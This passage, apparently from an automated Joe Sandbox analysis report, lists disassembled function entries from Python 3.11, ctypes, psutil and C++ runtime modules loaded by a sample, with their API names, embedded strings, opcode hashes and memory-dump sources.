                                                    • Part of subcall function 00007FF8B9098364: PyEval_RestoreThread.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B9098431
                                                  • PyEval_SaveThread.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B90A4B50
                                                  • PyThread_acquire_lock.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B90A4B65
                                                  • PyEval_RestoreThread.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B90A4B6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072699078.00007FF8B9091000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8B9090000, based on PE: true
                                                  • Associated: 00000002.00000002.2072666393.00007FF8B9090000.00000002.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90A8000.00000002.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072810626.00007FF8B90B4000.00000004.00000001.01000000.0000000B.sdmp
                                                  • Associated: 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9090000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_ModuleSizeStateThread_release_lockType_
                                                  • String ID: Compressor has been flushed
                                                  • API String ID: 3871537485-3904734015
                                                  • Opcode ID: b7deaa72277dee5a18a2e9f9e61238a57d26c55f915241b82e5b3f83901528c3
                                                  • Instruction ID: c4dcfa9bda82f5b0681acc4ed4e2c8b6398b9b58bd05841a21788d6b0bbd017a
                                                  • Opcode Fuzzy Hash: b7deaa72277dee5a18a2e9f9e61238a57d26c55f915241b82e5b3f83901528c3
                                                  • Instruction Fuzzy Hash: 7711E631A0CAC282EE54CF2AE8542696369FB88FD0F049031DF4E47B64DF3CE4668781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_SizeThread_release_lock
                                                  • String ID: Repeated call to flush()
                                                  • API String ID: 3236580226-194442007
                                                  • Opcode ID: a7363f18bb3a4be2b1f04e20a3cf77806fbf112a27042f4a7a0e0242247e6c36
                                                  • Instruction ID: cd87e8e4ed6f07260ef04e642ee0a1153c0d6c3adf0844a083fce0007cc86775
                                                  • Opcode Fuzzy Hash: a7363f18bb3a4be2b1f04e20a3cf77806fbf112a27042f4a7a0e0242247e6c36
                                                  • Instruction Fuzzy Hash: A511E231A08A9292EE149F2AE9542796379FB99BC1F048031DF1E47B55CF2CE49AC750
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_$CharFormatStringUnicode_Wide
                                                  • String ID: one character unicode string expected$unicode string expected instead of %s instance
                                                  • API String ID: 3624372013-2255738861
                                                  • Opcode ID: a442bb40f20c3a4dd4081ba5bcb0ae0298b6afa5f68cd383e2f326c911a818c9
                                                  • Instruction ID: 1dd96d3e3fd3e99ab087cae9edb4c8873ea97c0089d15b171be716a7983555d4
                                                  • Opcode Fuzzy Hash: a442bb40f20c3a4dd4081ba5bcb0ae0298b6afa5f68cd383e2f326c911a818c9
                                                  • Instruction Fuzzy Hash: FB11FB76A08F8291EB848F29E8541792760EF4AFF6F686032DB0E47764DE2CD894C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_CharErrorFreeFromLastLocalParseTupleUnicode_Wide
                                                  • String ID: <no description>$|i:FormatError
                                                  • API String ID: 935104296-1632374824
                                                  • Opcode ID: da62cbb651d4d48137c88a006a0480f238e20f846b976fc73609049c0e997912
                                                  • Instruction ID: b3df5705d14a5a318889adeae8b57863e1e6fa661dcb7574ed495cb676c22f3b
                                                  • Opcode Fuzzy Hash: da62cbb651d4d48137c88a006a0480f238e20f846b976fc73609049c0e997912
                                                  • Instruction Fuzzy Hash: 1F016161A08BC692EA548F29FC0407966B1AF45BF2F145234DB2E833D4EE7CE444D710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_Thread$Arg_Err_FreeFromLibraryParseRestoreSaveTupleWindows
                                                  • String ID: O&:FreeLibrary
                                                  • API String ID: 204461231-2600264430
                                                  • Opcode ID: 078f241c74f91baaec2f50080a5493ab98081374dae74a9cab3a0cffd8d54dea
                                                  • Instruction ID: 272e0ae04eae9bbd424e48490dc1935e3a09f6abe06ef7582776209ce5f895ba
                                                  • Opcode Fuzzy Hash: 078f241c74f91baaec2f50080a5493ab98081374dae74a9cab3a0cffd8d54dea
                                                  • Instruction Fuzzy Hash: 23011721A08F8782EA909F69FC505392760FF86BE6F186435DB4E83754DE2CE445D310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: String$Size$AttrBuildBytes_Err_FromObject_Value_
                                                  • String ID: O(O(NN))$__dict__$ctypes objects containing pointers cannot be pickled
                                                  • API String ID: 1770468409-724424928
                                                  • Opcode ID: 3ee03d1d2b345c529b1bd3c85f0488fda98b0b8f69e1e8ea5ec09f1cc578dd04
                                                  • Instruction ID: 87207780ce112e21163c1db16850786aa8c4943f1c0219b28602123f5a8c997b
                                                  • Opcode Fuzzy Hash: 3ee03d1d2b345c529b1bd3c85f0488fda98b0b8f69e1e8ea5ec09f1cc578dd04
                                                  • Instruction Fuzzy Hash: 6C011725A08F8292EA508F1AE94007967A0FF89BF6F485136DF4D17B64DF3CE555C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast
                                                  • String ID: psutil module couldn't set SE DEBUG mode for this process; please file an issue against psutil bug tracker$psutil-debug [%s:%d]> $psutil/arch/windows/security.c
                                                  • API String ID: 3541953607-2434820663
                                                  • Opcode ID: 58c77929247e69b2700a71a13f46cd48252ae07743b59a928d119bf549124666
                                                  • Instruction ID: 1c761616f10ccb3ab6d656a7c9439cc6f4210b2342b35a5b6ee930e82d06ffc1
                                                  • Opcode Fuzzy Hash: 58c77929247e69b2700a71a13f46cd48252ae07743b59a928d119bf549124666
                                                  • Instruction Fuzzy Hash: BD014F20F09AC681FE059F2DE8992B52B61AF60BE5F404037CB0E462A1DE6CE587C311
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1501936508-0
                                                  • Opcode ID: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                  • Instruction ID: 5eb730a58a0f455b046cd3b06578bb4a433d0dc306ea917f36e8c233b1cfe7be
                                                  • Opcode Fuzzy Hash: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                  • Instruction Fuzzy Hash: 17518E32E0AA4381FA65DB1A965463C6394FF54FC4F1A84B6DF4E06795DF2CE842E320
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1501936508-0
                                                  • Opcode ID: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                  • Instruction ID: 72ddbded6492c9c4ddf1e819fea62d245303afc2435e7f9d09cb327740514549
                                                  • Opcode Fuzzy Hash: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                  • Instruction Fuzzy Hash: CE518F21E0AB5381FA69DF1A954463867A6EF44FC0F0984BADF4D0A785DF2CE442E710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$FreeMalloc$Err_Memorymemcpy
                                                  • String ID:
                                                  • API String ID: 920471837-0
                                                  • Opcode ID: c91e9501240dbb047462beff57c3e24aa08f07d97696b8881faa54e688d9ffaf
                                                  • Instruction ID: 52a04d0a4e1eaf2f8bfb8f869ad7c17d811aad3a6eebf395967b84376a047219
                                                  • Opcode Fuzzy Hash: c91e9501240dbb047462beff57c3e24aa08f07d97696b8881faa54e688d9ffaf
                                                  • Instruction Fuzzy Hash: 4E512D22A09FC592EB898F39D5503B82360FB59BA5F18A235CF5D17396DF38A0E5C310
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Tuple_
                                                  • String ID:
                                                  • API String ID: 828192933-0
                                                  • Opcode ID: 5e62f5604a1117c70738b5e9d10e81d038eb8c1c9d08bc44558772b595a0c4de
                                                  • Instruction ID: e140c8c18574392cecc0d58c3ccd9bb0a951395c1f62ba04e911bdca46ebab4c
                                                  • Opcode Fuzzy Hash: 5e62f5604a1117c70738b5e9d10e81d038eb8c1c9d08bc44558772b595a0c4de
                                                  • Instruction Fuzzy Hash: 9C418372909BC285EEA58F2DE8046792690FF46BEAF086135DF4D46768DF3DE494C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_$DeallocObject_$AttrCallContainsErr_ErrorItemMakeOccurredUpdateWith
                                                  • String ID:
                                                  • API String ID: 3953964043-0
                                                  • Opcode ID: 514ed9f4908b8c8283f0e0c27daf6479cf123024387674585ac24fe74f6d228d
                                                  • Instruction ID: d92c6f4d14ae222298bbcdd75575a61605287c7f4f624fc96b5f1f46b8b4cebe
                                                  • Opcode Fuzzy Hash: 514ed9f4908b8c8283f0e0c27daf6479cf123024387674585ac24fe74f6d228d
                                                  • Instruction Fuzzy Hash: 4A411531F09BC281EA558F6DE9542B936A0AF46BF6F08A134DB4E467A5EF2CF445C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID:
                                                  • API String ID: 3617616757-0
                                                  • Opcode ID: 068abb66bbfb9b3a2a685b208f6aebfac36357060354af221ed5b1c6e4112d13
                                                  • Instruction ID: f39f222f56f319980a3fbb51ac882de6816f6b37d56c5036418f828c9c07815a
                                                  • Opcode Fuzzy Hash: 068abb66bbfb9b3a2a685b208f6aebfac36357060354af221ed5b1c6e4112d13
                                                  • Instruction Fuzzy Hash: B231E972E09B8681FF95AF78C85437823A8EF5AFBAF186134CB0E45295CF2DA545D300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleQueryVirtual$FileMappedName
                                                  • String ID: (KsOI)
                                                  • API String ID: 1759508357-341566991
                                                  • Opcode ID: 10afd08fc0d88ef5c7b41b69109da1ab331d51090cdaa12fa3b0d99e8a822f8a
                                                  • Instruction ID: 1af3faa9140896b3ad2b93434ed599eaf4331ae420d4949250b71afb3f7fb253
                                                  • Opcode Fuzzy Hash: 10afd08fc0d88ef5c7b41b69109da1ab331d51090cdaa12fa3b0d99e8a822f8a
                                                  • Instruction Fuzzy Hash: 50519A21A09AC681EE649F29A8583B97BA5BF64BE1F484131DF1E43794EF3CE417C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileHeader_local_unwind
                                                  • String ID: MOC$RCC$csm$csm
                                                  • API String ID: 2627209546-1441736206
                                                  • Opcode ID: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                  • Instruction ID: a6c3ec370df7c86fd29db42ee54ec4c4dd997a1d82bd784b4f241ea599061e7d
                                                  • Opcode Fuzzy Hash: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                  • Instruction Fuzzy Hash: 09517B72A08A1386EB609F29914137D26A0FF84FE4F1410B6EF8D57795CF3CE885E641
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: {for
                                                  • API String ID: 2943138195-864106941
                                                  • Opcode ID: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
                                                  • Instruction ID: aee99267168ab37c7a47761def1a063050a34bb7dfe0ea8b3f99dfa45b765643
                                                  • Opcode Fuzzy Hash: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
                                                  • Instruction Fuzzy Hash: 90513972A08A86A9F7119F28D5413E877A1FB44B88F8480B1EF5C4BB99DF7CE654D340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Object_$Dealloc$AttrInstanceLookup
                                                  • String ID: wrong type
                                                  • API String ID: 1828014136-2191655096
                                                  • Opcode ID: 48019a5db2fa545bbb614ff61a29e7f0ff849fa01fd9e197cdd365b54569e53e
                                                  • Instruction ID: b574488f9e3fb358f3ae75cbd40ee923ac78dad541b87856dea6562da0d08583
                                                  • Opcode Fuzzy Hash: 48019a5db2fa545bbb614ff61a29e7f0ff849fa01fd9e197cdd365b54569e53e
                                                  • Instruction Fuzzy Hash: B5514821A09B8391FE509F2DE95017967A0AF85BE2F186431DB4E877A5EF3CF450C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID: wrong type
                                                  • API String ID: 3617616757-2191655096
                                                  • Opcode ID: bdb23b902ebc4893c2a5809fa917940e2479e1e06ed5718a6fa12672c04d635d
                                                  • Instruction ID: 2cadc50c7c40c5c27fa57efbcffa86c98346a377ace34ed34412fea78985c1a9
                                                  • Opcode Fuzzy Hash: bdb23b902ebc4893c2a5809fa917940e2479e1e06ed5718a6fa12672c04d635d
                                                  • Instruction Fuzzy Hash: 6F516A21A1DBC391FE549F6DE85017867A0AF84BE2F486131DB0E877A5EF2CE841C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Bytes_FromSizeStringmemmove
                                                  • String ID: Unable to allocate output buffer.
                                                  • API String ID: 3327154725-2565006440
                                                  • Opcode ID: 9c30319a8999428dde325e815d48d283bad5c3e6560c2351fca3ed9412fd7cc3
                                                  • Instruction ID: 2cd0427d66a57557cdf6d4c4033b6437879e2666a363dbac371fe4572cb5048f
                                                  • Opcode Fuzzy Hash: 9c30319a8999428dde325e815d48d283bad5c3e6560c2351fca3ed9412fd7cc3
                                                  • Instruction Fuzzy Hash: 5D4147B2A08A8291EF168F1AD54426973B1FB48FE4F584432DF1E57756CF38E49AC300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: NameName::atol
                                                  • String ID: `template-parameter$void
                                                  • API String ID: 2130343216-4057429177
                                                  • Opcode ID: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
                                                  • Instruction ID: 68c90b06deacce168a972a8b198dfcc8235cd9a5c791779ef5df6e317537033f
                                                  • Opcode Fuzzy Hash: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
                                                  • Instruction Fuzzy Hash: 52413622F18B5698FB008BA8D8512BC23B1BF48BC8F9841B6DF0D27A59DF7CA545D340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+Replicator::operator[]
                                                  • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                  • API String ID: 1405650943-2211150622
                                                  • Opcode ID: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
